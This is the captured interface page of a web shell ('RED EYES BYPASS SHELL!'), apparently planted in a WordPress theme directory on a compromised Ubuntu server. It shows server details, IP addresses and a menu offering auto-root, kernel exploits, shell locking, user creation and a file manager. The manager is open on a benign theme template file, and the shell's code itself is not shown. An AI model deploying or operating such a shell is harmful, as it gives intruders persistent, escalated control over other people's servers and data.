Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
themes /
bnm /
page-templates /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
template-magazine.php
849
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : template-magazine.php
<?php /** * Template Name: Magazine Template * * @package BNM * @since BNM 1.0.3 */ get_header(); ?> <main id="primary" class="site-main"> <?php if ( is_active_sidebar( 'bnm-magazine-1' ) ) : ?> <div class="bnm-magazine-beside-sb"> <?php dynamic_sidebar( 'bnm-magazine-1' ); ?> </div> <?php endif; /** * Before Main Content Hook */ do_action( 'bnm_before_magazine_content' ); while ( have_posts() ) : the_post(); the_content(); endwhile; // End of the loop. /** * After Main Content Hook */ do_action( 'bnm_after_magazine_content' ); ?> </main><!-- #main --> <?php $bnm_page_layout = bnm_get_layout(); if ( 'right-sidebar' === $bnm_page_layout || 'left-sidebar' === $bnm_page_layout ) { get_sidebar(); } get_footer();
Close